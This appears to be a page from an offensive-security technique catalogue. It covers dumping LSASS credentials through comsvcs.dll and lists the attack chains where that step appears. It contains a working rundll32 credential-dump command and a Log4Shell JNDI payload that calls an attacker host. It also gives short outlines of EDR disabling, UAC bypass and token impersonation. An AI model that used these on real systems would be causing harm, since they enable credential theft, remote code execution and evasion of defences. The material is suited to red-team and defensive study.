LSASS via procdump / comsvcs.dll
rundll32.exe C:\windows\system32\comsvcs.dll MiniDump <pid> dump.dmp full — dump LSASS without Mimikatz signature.
§ Where this technique fits
W-LSASS-PROCDUMP is catalogued under the Credential Access tactic of the offensive-security kill-chain. It appears in 9 approved dossiers in the registry, typically at step 4.8 on average.
§ Dossiers chaining this technique
- step 4 / 5
EternalBlue (MS17-010) → SMBv1 wormable spread
Unpatched Windows 7 / Server 2008 with SMBv1 enabled — pre-auth kernel RCE. Used by WannaCry / NotPetya in 2017, still found on enclave / industrial networks.
- step 4 / 6
ProxyShell → SYSTEM on Exchange → DA
Pre-auth ProxyShell chain (path confusion + EWS email-to-PowerShell + arbitrary file write) deploys a webshell as SYSTEM. Same post-exploitation as ProxyLogon.
- step 4 / 6
ProxyLogon → webshell on Exchange → DA
Unauth SSRF + auth bypass against on-prem Exchange (CAS) — write a webshell as SYSTEM on the Exchange server, dump LSASS for cached domain creds, pivot to DA.
- step 5 / 5
BYOVD → kernel-level disable of EDR callbacks
From local admin, load a signed-but-vulnerable driver. Use its kernel primitive to walk the EDR's PsSetCreateProcessNotifyRoutine entries and unlink them — EDR stops receiving events while still 'running'.
- step 5 / 6
Unpatched Confluence (CVE-2023-22515) → internal foothold
Internal Confluence instance reachable from the corporate VLAN. Trivial privilege-escalation CVE creates an admin user; webshell uploaded; pivot into AD service accounts.
- step 5 / 6
Jenkins /script Groovy console → RCE → AD
Jenkins script console exposed unauth on the corporate intranet — Groovy 'execute()' = RCE as the Jenkins service account, often a domain user with broad agent access.
- step 5 / 5
UAC bypass → elevated admin on a workstation
Standard medium-integrity admin user runs fodhelper / silentcleanup / computerdefaults auto-elevate bypass — gets a high-integrity session without a UAC prompt.
- step 5 / 5
Service account → SYSTEM via named-pipe impersonation
Service-context shell has SeImpersonatePrivilege. Use Potato-family tools (Juicy / Rogue / Print / God) to coerce SYSTEM to authenticate to an attacker-controlled named pipe, then impersonate the token.
- step 6 / 6
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
§ What commonly comes next
- 01AdminSDHolder Abuseseen 2×AD-ADMINSDHOLDER · Persistence
- 02Pass the Hashseen 2×T1550.002 · Lateral Movement
- 03SMB/Windows Admin Sharesseen 1×T1021.002 · Lateral Movement